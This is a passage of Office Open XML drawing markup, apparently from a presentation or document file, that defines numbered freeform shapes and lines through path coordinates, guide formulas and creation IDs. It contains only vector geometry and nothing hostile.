                    <a:moveTo>
                      <a:pt x="0" y="26"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="73" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="0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6" name="Freeform 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D58238-556E-46E5-9A46-5957CE34E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2298"/>
                <a:ext cx="78" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 78"/>
                  <a:gd name="T1" fmla="*/ 0 h 45"/>
                  <a:gd name="T2" fmla="*/ 77 w 78"/>
                  <a:gd name="T3" fmla="*/ 36 h 45"/>
                  <a:gd name="T4" fmla="*/ 74 w 78"/>
                  <a:gd name="T5" fmla="*/ 44 h 45"/>
                  <a:gd name="T6" fmla="*/ 0 w 78"/>
                  <a:gd name="T7" fmla="*/ 7 h 45"/>
                  <a:gd name="T8" fmla="*/ 2 w 78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45"/>
                  <a:gd name="T17" fmla="*/ 78 w 78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45">
                    <a:moveTo>
                      <a:pt x="2" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="77" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7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7" name="Freeform 62">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C063DBA-EBF5-4B98-8AA0-45FD933AD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" y="2299"/>
                <a:ext cx="84" cy="44"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 84"/>
                  <a:gd name="T1" fmla="*/ 43 h 44"/>
                  <a:gd name="T2" fmla="*/ 2 w 84"/>
                  <a:gd name="T3" fmla="*/ 35 h 44"/>
                  <a:gd name="T4" fmla="*/ 83 w 84"/>
                  <a:gd name="T5" fmla="*/ 0 h 44"/>
                  <a:gd name="T6" fmla="*/ 79 w 84"/>
                  <a:gd name="T7" fmla="*/ 6 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 84"/>
                  <a:gd name="T9" fmla="*/ 43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44"/>
                  <a:gd name="T17" fmla="*/ 84 w 84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44">
                    <a:moveTo>
                      <a:pt x="0" y="43"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="43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8" name="Freeform 63">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BF69053-E4C0-443B-A7AF-C1EF3DAE1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6" y="2301"/>
                <a:ext cx="58" cy="25"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 58"/>
                  <a:gd name="T1" fmla="*/ 5 h 25"/>
                  <a:gd name="T2" fmla="*/ 19 w 58"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 57 w 58"/>
                  <a:gd name="T5" fmla="*/ 16 h 25"/>
                  <a:gd name="T6" fmla="*/ 38 w 58"/>
                  <a:gd name="T7" fmla="*/ 24 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 58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5"/>
                  <a:gd name="T17" fmla="*/ 58 w 58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5">
                    <a:moveTo>
                      <a:pt x="0" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="24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99" name="Freeform 64">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E58842D8-6D68-4A42-A587-3A30854F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" y="2281"/>
                <a:ext cx="88" cy="35"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 88"/>
                  <a:gd name="T1" fmla="*/ 16 h 35"/>
                  <a:gd name="T2" fmla="*/ 37 w 88"/>
                  <a:gd name="T3" fmla="*/ 34 h 35"/>
                  <a:gd name="T4" fmla="*/ 87 w 88"/>
                  <a:gd name="T5" fmla="*/ 15 h 35"/>
                  <a:gd name="T6" fmla="*/ 51 w 88"/>
                  <a:gd name="T7" fmla="*/ 0 h 35"/>
                  <a:gd name="T8" fmla="*/ 0 w 88"/>
                  <a:gd name="T9" fmla="*/ 16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35"/>
                  <a:gd name="T17" fmla="*/ 88 w 88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35">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51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00" name="Freeform 65">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A0775EC-385D-45E4-898D-ABEEAB93B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" y="2275"/>
                <a:ext cx="97" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 97"/>
                  <a:gd name="T1" fmla="*/ 30 h 31"/>
                  <a:gd name="T2" fmla="*/ 0 w 97"/>
                  <a:gd name="T3" fmla="*/ 21 h 31"/>
                  <a:gd name="T4" fmla="*/ 80 w 97"/>
                  <a:gd name="T5" fmla="*/ 0 h 31"/>
                  <a:gd name="T6" fmla="*/ 96 w 97"/>
                  <a:gd name="T7" fmla="*/ 5 h 31"/>
                  <a:gd name="T8" fmla="*/ 19 w 97"/>
                  <a:gd name="T9" fmla="*/ 3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1"/>
                  <a:gd name="T17" fmla="*/ 97 w 97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1">
                    <a:moveTo>
                      <a:pt x="19" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="30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01" name="Line 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2F0810-D39F-4B97-AFEF-A6E08705C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7" y="2271"/>
                <a:ext cx="87" cy="2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2" name="Line 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62498BFB-5BC6-4C11-809A-7D797EE6B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15" y="2273"/>
                <a:ext cx="83" cy="2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3" name="Line 68">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8E73B18-1746-49F4-8862-3A6A87632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0" y="2280"/>
                <a:ext cx="81" cy="2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4" name="Line 69">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F1AF9DE-73CD-4668-B02B-9AB4B2AC9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32" y="2279"/>
                <a:ext cx="77" cy="2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5" name="Line 70">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{334211C9-B446-4276-9671-4291477A2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1" y="2289"/>
                <a:ext cx="80" cy="2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6" name="Line 71">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA15513F-0892-4C99-B24C-45CA1C62E4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5" y="2290"/>
                <a:ext cx="77" cy="2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7" name="Line 72">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5F13DF7-B295-435C-BCE6-62E20E740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6" y="2291"/>
                <a:ext cx="76" cy="3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8" name="Line 73">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A02764C5-9F37-4704-9F59-9DF9D53DA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5" y="2290"/>
                <a:ext cx="74" cy="2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9" name="Line 74">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1168BA39-33ED-4F2E-8CA8-0501D44FE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1" y="2307"/>
                <a:ext cx="37" cy="2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0" name="Line 75">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F967076-28A9-49B6-839C-A9C2CA319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8" y="2304"/>
                <a:ext cx="40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1" name="Line 76">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E181688A-86D7-4853-8389-AC011D1A4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7" y="2299"/>
                <a:ext cx="37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2" name="Line 77">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E6D1834-BF99-4674-AA74-EFBAA5571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6" y="2295"/>
                <a:ext cx="38" cy="1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3" name="Line 78">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F873BAE9-F16A-41C8-A34A-741C75082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" y="2292"/>
                <a:ext cx="38" cy="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4" name="Line 79">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17DF14FB-A738-4C79-BD6D-A7B6282DD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3" y="2290"/>
                <a:ext cx="36" cy="1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5" name="Line 80">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAB7F6D6-3427-41CA-918A-55E5B3177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1" y="2286"/>
                <a:ext cx="38" cy="1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6" name="Line 81">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC998E8E-8B10-44C6-A5DA-44893AA6A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2297"/>
                <a:ext cx="17" cy="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7" name="Line 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{643E9BBB-A297-4661-A3C6-12ACB6CE9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7" y="2292"/>
                <a:ext cx="16" cy="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8" name="Line 83">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2F0A963-B9F0-4080-9F83-4CB934DA8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7" y="2290"/>
                <a:ext cx="19" cy="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9" name="Line 84">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF711C4-6EE5-4699-AAA2-5432189BC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2286"/>
                <a:ext cx="18" cy="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0" name="Line 85">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04AE5D28-98B1-439F-95B0-A55C81922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2" y="2282"/>
                <a:ext cx="15" cy="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1" name="Line 86">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99B7A69E-1A2E-4254-AB0C-DA4448DC4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" y="2278"/>
                <a:ext cx="15" cy="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2" name="Freeform 87">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DF136FC-7EA2-440F-BEFC-3509C7ABF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247"/>
                <a:ext cx="37" cy="65"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 37"/>
                  <a:gd name="T1" fmla="*/ 23 h 65"/>
                  <a:gd name="T2" fmla="*/ 29 w 37"/>
                  <a:gd name="T3" fmla="*/ 14 h 65"/>
                  <a:gd name="T4" fmla="*/ 22 w 37"/>
                  <a:gd name="T5" fmla="*/ 10 h 65"/>
                  <a:gd name="T6" fmla="*/ 20 w 37"/>
                  <a:gd name="T7" fmla="*/ 4 h 65"/>
                  <a:gd name="T8" fmla="*/ 18 w 37"/>
                  <a:gd name="T9" fmla="*/ 0 h 65"/>
                  <a:gd name="T10" fmla="*/ 10 w 37"/>
                  <a:gd name="T11" fmla="*/ 0 h 65"/>
                  <a:gd name="T12" fmla="*/ 0 w 37"/>
                  <a:gd name="T13" fmla="*/ 5 h 65"/>
                  <a:gd name="T14" fmla="*/ 2 w 37"/>
                  <a:gd name="T15" fmla="*/ 16 h 65"/>
                  <a:gd name="T16" fmla="*/ 5 w 37"/>
                  <a:gd name="T17" fmla="*/ 23 h 65"/>
                  <a:gd name="T18" fmla="*/ 13 w 37"/>
                  <a:gd name="T19" fmla="*/ 43 h 65"/>
                  <a:gd name="T20" fmla="*/ 23 w 37"/>
                  <a:gd name="T21" fmla="*/ 64 h 65"/>
                  <a:gd name="T22" fmla="*/ 36 w 37"/>
                  <a:gd name="T23" fmla="*/ 23 h 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7"/>
                  <a:gd name="T37" fmla="*/ 0 h 65"/>
                  <a:gd name="T38" fmla="*/ 37 w 37"/>
                  <a:gd name="T39" fmla="*/ 65 h 6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7" h="65">
                    <a:moveTo>
                      <a:pt x="36" y="23"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="14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0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="23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3" name="Freeform 88">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F3BE1C-E4EC-480D-A472-DCE1711FC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" y="2252"/>
                <a:ext cx="26" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 26"/>
                  <a:gd name="T1" fmla="*/ 0 h 42"/>
                  <a:gd name="T2" fmla="*/ 12 w 26"/>
                  <a:gd name="T3" fmla="*/ 2 h 42"/>
                  <a:gd name="T4" fmla="*/ 5 w 26"/>
                  <a:gd name="T5" fmla="*/ 5 h 42"/>
                  <a:gd name="T6" fmla="*/ 0 w 26"/>
                  <a:gd name="T7" fmla="*/ 5 h 42"/>
                  <a:gd name="T8" fmla="*/ 4 w 26"/>
                  <a:gd name="T9" fmla="*/ 13 h 42"/>
                  <a:gd name="T10" fmla="*/ 8 w 26"/>
                  <a:gd name="T11" fmla="*/ 13 h 42"/>
                  <a:gd name="T12" fmla="*/ 11 w 26"/>
                  <a:gd name="T13" fmla="*/ 11 h 42"/>
                  <a:gd name="T14" fmla="*/ 10 w 26"/>
                  <a:gd name="T15" fmla="*/ 14 h 42"/>
                  <a:gd name="T16" fmla="*/ 4 w 26"/>
                  <a:gd name="T17" fmla="*/ 15 h 42"/>
                  <a:gd name="T18" fmla="*/ 8 w 26"/>
                  <a:gd name="T19" fmla="*/ 25 h 42"/>
                  <a:gd name="T20" fmla="*/ 10 w 26"/>
                  <a:gd name="T21" fmla="*/ 33 h 42"/>
                  <a:gd name="T22" fmla="*/ 12 w 26"/>
                  <a:gd name="T23" fmla="*/ 28 h 42"/>
                  <a:gd name="T24" fmla="*/ 13 w 26"/>
                  <a:gd name="T25" fmla="*/ 21 h 42"/>
                  <a:gd name="T26" fmla="*/ 13 w 26"/>
                  <a:gd name="T27" fmla="*/ 16 h 42"/>
                  <a:gd name="T28" fmla="*/ 14 w 26"/>
                  <a:gd name="T29" fmla="*/ 18 h 42"/>
                  <a:gd name="T30" fmla="*/ 14 w 26"/>
                  <a:gd name="T31" fmla="*/ 23 h 42"/>
                  <a:gd name="T32" fmla="*/ 13 w 26"/>
                  <a:gd name="T33" fmla="*/ 31 h 42"/>
                  <a:gd name="T34" fmla="*/ 12 w 26"/>
                  <a:gd name="T35" fmla="*/ 35 h 42"/>
                  <a:gd name="T36" fmla="*/ 14 w 26"/>
                  <a:gd name="T37" fmla="*/ 41 h 42"/>
                  <a:gd name="T38" fmla="*/ 18 w 26"/>
                  <a:gd name="T39" fmla="*/ 26 h 42"/>
                  <a:gd name="T40" fmla="*/ 20 w 26"/>
                  <a:gd name="T41" fmla="*/ 21 h 42"/>
                  <a:gd name="T42" fmla="*/ 23 w 26"/>
                  <a:gd name="T43" fmla="*/ 14 h 42"/>
                  <a:gd name="T44" fmla="*/ 25 w 26"/>
                  <a:gd name="T45" fmla="*/ 12 h 42"/>
                  <a:gd name="T46" fmla="*/ 22 w 26"/>
                  <a:gd name="T47" fmla="*/ 9 h 42"/>
                  <a:gd name="T48" fmla="*/ 17 w 26"/>
                  <a:gd name="T49" fmla="*/ 7 h 42"/>
                  <a:gd name="T50" fmla="*/ 14 w 26"/>
                  <a:gd name="T51" fmla="*/ 8 h 42"/>
                  <a:gd name="T52" fmla="*/ 16 w 26"/>
                  <a:gd name="T53" fmla="*/ 5 h 42"/>
                  <a:gd name="T54" fmla="*/ 14 w 26"/>
                  <a:gd name="T55" fmla="*/ 0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6"/>
                  <a:gd name="T85" fmla="*/ 0 h 42"/>
                  <a:gd name="T86" fmla="*/ 26 w 26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6" h="42">
                    <a:moveTo>
                      <a:pt x="14" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12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11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="28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4" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="8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4" name="Freeform 89">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C5805D-3E9B-4E6C-AB0F-596470F2A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9" y="2212"/>
                <a:ext cx="35" cy="44"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 34 w 35"/>
                  <a:gd name="T1" fmla="*/ 16 h 44"/>
                  <a:gd name="T2" fmla="*/ 32 w 35"/>
                  <a:gd name="T3" fmla="*/ 18 h 44"/>
                  <a:gd name="T4" fmla="*/ 30 w 35"/>
                  <a:gd name="T5" fmla="*/ 19 h 44"/>
                  <a:gd name="T6" fmla="*/ 29 w 35"/>
                  <a:gd name="T7" fmla="*/ 23 h 44"/>
                  <a:gd name="T8" fmla="*/ 28 w 35"/>
                  <a:gd name="T9" fmla="*/ 25 h 44"/>
                  <a:gd name="T10" fmla="*/ 26 w 35"/>
                  <a:gd name="T11" fmla="*/ 26 h 44"/>
                  <a:gd name="T12" fmla="*/ 24 w 35"/>
                  <a:gd name="T13" fmla="*/ 27 h 44"/>
                  <a:gd name="T14" fmla="*/ 21 w 35"/>
                  <a:gd name="T15" fmla="*/ 28 h 44"/>
                  <a:gd name="T16" fmla="*/ 20 w 35"/>
                  <a:gd name="T17" fmla="*/ 30 h 44"/>
                  <a:gd name="T18" fmla="*/ 20 w 35"/>
                  <a:gd name="T19" fmla="*/ 32 h 44"/>
                  <a:gd name="T20" fmla="*/ 21 w 35"/>
                  <a:gd name="T21" fmla="*/ 38 h 44"/>
                  <a:gd name="T22" fmla="*/ 17 w 35"/>
                  <a:gd name="T23" fmla="*/ 41 h 44"/>
                  <a:gd name="T24" fmla="*/ 13 w 35"/>
                  <a:gd name="T25" fmla="*/ 43 h 44"/>
                  <a:gd name="T26" fmla="*/ 9 w 35"/>
                  <a:gd name="T27" fmla="*/ 43 h 44"/>
                  <a:gd name="T28" fmla="*/ 6 w 35"/>
                  <a:gd name="T29" fmla="*/ 43 h 44"/>
                  <a:gd name="T30" fmla="*/ 5 w 35"/>
                  <a:gd name="T31" fmla="*/ 39 h 44"/>
                  <a:gd name="T32" fmla="*/ 5 w 35"/>
                  <a:gd name="T33" fmla="*/ 31 h 44"/>
                  <a:gd name="T34" fmla="*/ 2 w 35"/>
                  <a:gd name="T35" fmla="*/ 28 h 44"/>
                  <a:gd name="T36" fmla="*/ 0 w 35"/>
                  <a:gd name="T37" fmla="*/ 25 h 44"/>
                  <a:gd name="T38" fmla="*/ 0 w 35"/>
                  <a:gd name="T39" fmla="*/ 20 h 44"/>
                  <a:gd name="T40" fmla="*/ 0 w 35"/>
                  <a:gd name="T41" fmla="*/ 16 h 44"/>
                  <a:gd name="T42" fmla="*/ 0 w 35"/>
                  <a:gd name="T43" fmla="*/ 13 h 44"/>
                  <a:gd name="T44" fmla="*/ 0 w 35"/>
                  <a:gd name="T45" fmla="*/ 11 h 44"/>
                  <a:gd name="T46" fmla="*/ 0 w 35"/>
                  <a:gd name="T47" fmla="*/ 8 h 44"/>
                  <a:gd name="T48" fmla="*/ 3 w 35"/>
                  <a:gd name="T49" fmla="*/ 5 h 44"/>
                  <a:gd name="T50" fmla="*/ 5 w 35"/>
                  <a:gd name="T51" fmla="*/ 5 h 44"/>
                  <a:gd name="T52" fmla="*/ 6 w 35"/>
                  <a:gd name="T53" fmla="*/ 4 h 44"/>
                  <a:gd name="T54" fmla="*/ 8 w 35"/>
                  <a:gd name="T55" fmla="*/ 3 h 44"/>
                  <a:gd name="T56" fmla="*/ 11 w 35"/>
                  <a:gd name="T57" fmla="*/ 4 h 44"/>
                  <a:gd name="T58" fmla="*/ 13 w 35"/>
                  <a:gd name="T59" fmla="*/ 1 h 44"/>
                  <a:gd name="T60" fmla="*/ 15 w 35"/>
                  <a:gd name="T61" fmla="*/ 0 h 44"/>
                  <a:gd name="T62" fmla="*/ 18 w 35"/>
                  <a:gd name="T63" fmla="*/ 3 h 44"/>
                  <a:gd name="T64" fmla="*/ 19 w 35"/>
                  <a:gd name="T65" fmla="*/ 0 h 44"/>
                  <a:gd name="T66" fmla="*/ 24 w 35"/>
                  <a:gd name="T67" fmla="*/ 0 h 44"/>
                  <a:gd name="T68" fmla="*/ 25 w 35"/>
                  <a:gd name="T69" fmla="*/ 5 h 44"/>
                  <a:gd name="T70" fmla="*/ 26 w 35"/>
                  <a:gd name="T71" fmla="*/ 7 h 44"/>
                  <a:gd name="T72" fmla="*/ 26 w 35"/>
                  <a:gd name="T73" fmla="*/ 11 h 44"/>
                  <a:gd name="T74" fmla="*/ 27 w 35"/>
                  <a:gd name="T75" fmla="*/ 16 h 44"/>
                  <a:gd name="T76" fmla="*/ 29 w 35"/>
                  <a:gd name="T77" fmla="*/ 14 h 44"/>
                  <a:gd name="T78" fmla="*/ 29 w 35"/>
                  <a:gd name="T79" fmla="*/ 11 h 44"/>
                  <a:gd name="T80" fmla="*/ 29 w 35"/>
                  <a:gd name="T81" fmla="*/ 8 h 44"/>
                  <a:gd name="T82" fmla="*/ 30 w 35"/>
                  <a:gd name="T83" fmla="*/ 7 h 44"/>
                  <a:gd name="T84" fmla="*/ 32 w 35"/>
                  <a:gd name="T85" fmla="*/ 6 h 44"/>
                  <a:gd name="T86" fmla="*/ 34 w 35"/>
                  <a:gd name="T87" fmla="*/ 6 h 44"/>
                  <a:gd name="T88" fmla="*/ 34 w 35"/>
                  <a:gd name="T89" fmla="*/ 8 h 44"/>
                  <a:gd name="T90" fmla="*/ 33 w 35"/>
                  <a:gd name="T91" fmla="*/ 9 h 44"/>
                  <a:gd name="T92" fmla="*/ 33 w 35"/>
                  <a:gd name="T93" fmla="*/ 13 h 44"/>
                  <a:gd name="T94" fmla="*/ 34 w 35"/>
                  <a:gd name="T95" fmla="*/ 16 h 4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5"/>
                  <a:gd name="T145" fmla="*/ 0 h 44"/>
                  <a:gd name="T146" fmla="*/ 35 w 35"/>
                  <a:gd name="T147" fmla="*/ 44 h 4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5" h="44">
                    <a:moveTo>
                      <a:pt x="34" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="25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20" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="43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5" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="31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6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4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26" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="16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29" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="7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3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="16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5" name="Freeform 90">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A5DF9A6-6C43-44F1-A522-C389C0399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217"/>
                <a:ext cx="17" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 17"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 13 w 17"/>
                  <a:gd name="T3" fmla="*/ 4 h 17"/>
                  <a:gd name="T4" fmla="*/ 12 w 17"/>
                  <a:gd name="T5" fmla="*/ 4 h 17"/>
                  <a:gd name="T6" fmla="*/ 14 w 17"/>
                  <a:gd name="T7" fmla="*/ 11 h 17"/>
                  <a:gd name="T8" fmla="*/ 12 w 17"/>
                  <a:gd name="T9" fmla="*/ 12 h 17"/>
                  <a:gd name="T10" fmla="*/ 10 w 17"/>
                  <a:gd name="T11" fmla="*/ 12 h 17"/>
                  <a:gd name="T12" fmla="*/ 10 w 17"/>
                  <a:gd name="T13" fmla="*/ 9 h 17"/>
                  <a:gd name="T14" fmla="*/ 9 w 17"/>
